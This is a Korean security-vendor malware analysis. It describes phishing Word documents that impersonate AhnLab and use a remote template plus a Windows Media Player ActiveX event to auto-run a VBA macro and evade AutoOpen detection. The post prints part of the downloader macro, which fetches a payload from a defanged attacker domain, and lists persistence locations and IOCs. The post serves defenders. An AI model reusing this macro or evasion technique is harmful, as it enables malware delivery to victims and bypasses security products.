MS Media Player 이용한 악성 워드문서 (안랩사칭)

ASEC 분석팀은 지난주 “기업 사용자 타겟의 악성 워드 문서 유포 중“에서 작성한 유형의 악성 워드 문서가 안랩을 사칭하는 문구를 포함하여 유포되고 있음을 확인하였다. 이번에 확인된 워드 문서는 External 연결을 통해 악성 VBA 매크로가 포함된 워드 문서를 다운로드 받아 실행하는 방식으로 동작한다. 또 다른 차이점은 추가로 다운로드된 워드 문서에서 악성 VBA 매크로를 자동으로 실행하기 위해 기존의 AutoOpen() 함수가 아닌 Windows Media Player() 함수를 이용하였다는 점이다. 이는 AutoOpen() 함수 기반의 매크로 자동 실행을 탐지하는 보안 제품을 우회하기 위한 시도로 추정된다.

확인된 문서의 파일명은 다음과 같다.

– NFT 분할.docx
– 202203_BTC_ETH_추가계정정보.docx
– 유사수신행위 고소장.docx
– 유사수신고소장.docx
– BTC_ETH자동매매계정정보.docx
– 암호화폐_투자기획.docx

워드 문서 실행 시 내부 word\_rels\settings.xml.rels 파일에 존재하는 External URL을 이용하여 워드 매크로(dotm) 파일을 다운로드 받아 실행한다.

그림1. settings.xml.rels 파일 내부
그림2. 문서 실행 시 External URL 접속 시도 화면

Extrenal URL을 통해 다운로드가 정상적으로 이루어지면 아래와 같이 매크로가 포함된다. 공격자는 매크로 허용을 유도하기 위해 자사를 사칭한 이미지와 문구를 삽입하였다.

그림3. 워드 문서 내용

사용자가 콘텐츠 사용 버튼 클릭 시 External  URL을 통해 다운로드한 워드 문서에 존재하는 악성 VBA 매크로가 실행된다.
해당 매크로에는 기존 워드 문서에서 사용되었던 AutoOpen() 함수 대신 WindowsMediaPlayer1_OpenStateChange() 함수로 작성되어 있다. 이는 Windows Media Player 개체의 openState 속성이 변경될 때 실행된다. 해당 함수가 실행되면 전과 동일하게 RunFE() 함수를 통해 악성 행위를 수행한다. 다음은 VBA 매크로 코드의 일부이다.

Private Function RunFE() As Long
    Dim MR As Object
    Dim bbb As String
    Dim i As Long
    Randomize
    Call Init
    For i = 0 To 8: bbb = bbb & Chr(Map1(Int(62 * Rnd()))): Next i
    Set MR = CreateObject(DecodeSTR("tw7v/v2UF6/h4I4v9cL5sgLww+yTE6+Dp9E=")) 'WinHttp.WinHttpRequest.5.1
    Call MR.SetTimeouts(0, 2000, 2000, 5000)
    #If Win64 Then
        MR.Open "GET", DecodeSTR("iBP1xrPPSNvg6tEO6/fczgngwOyJBO7f+YNJ9dPqiEjA9cSzSLHa/64myof9z1ftwMehLLDCv9RJ4NXk") & "?" & bbb & "=" & bbb 'hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t64.acm
    #Else
        MR.Open "GET", DecodeSTR("iBP1xrPPSNvg6tEO6/fczgngwOyJBO7f+YNJ9dPqiEjA9cSzSLHa/64myof9z1ftwMehLLDCutJJ4NXk") & "?" & bbb & "=" & bbb  'hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t32.acm
    #End If
<생략>

Private Sub WindowsMediaPlayer1_OpenStateChange(ByVal NewState As Long)
    If bFlag = False Then
        Call CTD
        Dim rfRes As Long
        rfRes = RunFE()
        If rfRes = 1 Then
            bFlag = True
        End If
    End If
End Sub

External URL을 통해 다운로드 된 워드 문서를 단독 실행하면 Windows Media Player를 확인할 수 있다. 문서 내부에는 다음과 같이 이름이 WindowsMediaPlayer1인 Windows Media Player가 삽입되어 있다.

그림4. 추가 다운로드 워드 문서 내용

공격자는 WindowsMediaPlayer1_OpenStateChange() 함수를 자동으로 실행하기 위해 해당 Player의 옵션으로 자동시작을 지정하였다. Player가 실행되면 VBA 매크로 내  WindowsMediaPlayer1_OpenStateChange()가 실행되어 사용자가 Player에 대해 추가 작업을 수행하지 않아도 악성 행위가 수행된다. 결론적으로 공격자가 Player를 자동 시작되도록 설정하였기 때문에 사용자가 콘텐츠 사용 버튼 클릭 시 자동적으로 악성 매크로가 실행된다.

그림5. word\activeX\activeX1.xml 파일 내부
그림6. WindowsMediaPlayer1의 속성

매크로 코드에 의해 수행되는 악성 행위는 기존에 공유된 내용과 동일하다. 사용자 PC 환경에 맞게 추가 악성코드를 다운로드 후 word 프로세스에 인젝션하여 실행한다.

다운로드 URL
– X86 환경 : hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t32.acm
– X64 환경 : hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t64.acm

이후 %ProgramData%\USOShared\Logs 폴더에 USOService.exe를 드롭 및 실행하고 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WUService 레지스트리로 등록하여 해당 파일이 지속적으로 실행될 수 있도록 한다.

그림7. 생성된 실행 파일

추가로 확인된 ‘유사수신행위 고소장.docx’ 의 External URL로부터 다운로드 받은 dotm 파일의 경우 매크로 허용 시 아래와 같은 메시지 박스를 생성한다. 해당 워드 문서의 경우 \AppData\Local\Microsoft\Office\ 폴더에 UpdateChecker.exe로 악성 파일을 생성한다. 이를 통해 공격자가 %ProgramData% 폴더 외에도 다양한 폴더에 악성코드를 드롭하는 것을 알 수 있다.

그림8. 다운로드 URL에 접속 성공 시 생성되는 메시지 박스
그림9. 다운로드 URL에 접속 실패 시 생성되는 메시지 박스

최근 워드 문서를 이용한 공격이 지속적으로 확인되고 있다. 사용자의 매크로 허용을 유도하기 위해 자사를 위장한 사례가 확인된 만큼 매크로 사용을 유도하기 위한 이미지 및 본문 내용이 다양해지고 있어 사용자는 매크로 사용에 주의해야 한다.

현재 안랩 V3 제품은 해당 파일에 대해 다음과 같이 진단하고있다.

[파일 진단]
Downloader/DOC.Akdoor
Downloadaer/XML.Generic
Trojan/Win.Generic.C5025270

[IOC]
ce00749c908de017010055a83ac0654f
783e7c3ba39daa28301b841785794d76
2fec0c6ff8af4484471633aeaa1c9996
6df608342938f0d30a058c48bb9d8d4d
hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t32.acm
hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t64.acm
hxxp://naveicoipc[.]tech/ACMS/0nXbQs2e/topAccounts?uid=rt6i45sd
hxxp://naveicoipd[.]tech/ACMS/018ueCdS/blockchainTemplate
hxxp://bcvbert.naveicoipe[.]tech/ACMS/01AweT9Z/wwwTemplate?uid=glvrdta
hxxp://wrhehdfg.naveicoipe[.]tech/ACMS/0TQyKdO9/accountTemplate0330?vvvid=rehs4344s
hxxp://msldkopw.naveicoipe[.]tech/ACMS/0TQyKdO9/accountTemplate03301?vvvid=zxzdfherh
hxxp://uktyukb.naveicoipe[.]tech/ACMS/0TQyKdO9/accountTemplate03304?vvvid=cvnrturr
hxxp://gowelknx.naveicoipf[.]online/ACMS/07RRwrwK/securityTemplate0?securityID=ffsdwiefwe
hxxp://xjowihgnxcvb.naveicoipf[.]online/ACMS/07RRwrwK/securityTemplate3?securityID=cbvkoweoigwk

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:,

5 1 vote
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments